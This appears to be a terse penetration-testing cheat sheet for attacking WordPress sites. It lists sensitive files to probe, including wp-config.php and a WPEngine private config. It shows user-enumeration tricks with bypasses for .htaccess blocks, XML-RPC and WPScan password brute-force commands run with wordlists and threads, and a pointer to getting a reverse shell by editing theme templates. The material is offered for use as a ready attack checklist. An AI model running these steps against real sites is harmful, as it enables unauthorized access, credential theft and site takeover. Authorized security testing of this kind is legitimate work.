# Username can be guessed on WordPress since the username will generate a different error message if it doesn't exist.# Interesting files
https://monsite.com/robots.txt
https://monsite.com/feed
https://monsite.com/readme.html
https://monsite.com/xmlrpc.php
# Configuration files
https://monsite.com/.htaccess
https://monsite.com/wp-config.php
# Directory listing
https://monsite.com/wp-includes
# XML-RPC attack (https://github.com/1N3/Wordpress-XMLRPC-Brute-Force-Exploit)# You can bruteforce users
./wp-xml-brute http://target.com/xmlrpc.php passwords.txt username1
# If by any way you can upload files, go check /upload or /uploads for your files# Get WPEngine's config file
/_wpeprivate/config.json
Scanning and enumeration
# Enumerate users
Users can be found using ?author=XXX
# You can also use this
using /wp-json/wp/v2/users, then iterate that way /wp-json/wp/v2/users/1
# If /?author=1 is 403 Forbidden, you can bypass it# If the .htaccess blocks "?author"# Bypass 1 : http://xxx.fr/?x&author=1 --> http://xxx.fr/author/chris/?x# Bypass 2 : http://lictor.fr/index.php?author=1# Another way
/wp-json/?rest_route=/wp/v2/users
# WPScan is a great automatic tool (you can dockerise)
docker pull wpscanteam/wpscan
docker run -it --rm wpscanteam/wpscan -u https://yourblog.com [options]# Non intrusive scan
wpscan.rb --url www.example.com
# Bruteforce users found using 50 threads
wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50# Bruteforce on one user
wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin
# Plugins enumeration
wpscan.rb --url www.example.com --enumerate p
# Users enumeration
wpscan.rb --url www.example.com --enumerate u
Reverse Shell
# You can reverse shell by editing templates (404.php, footer.php...)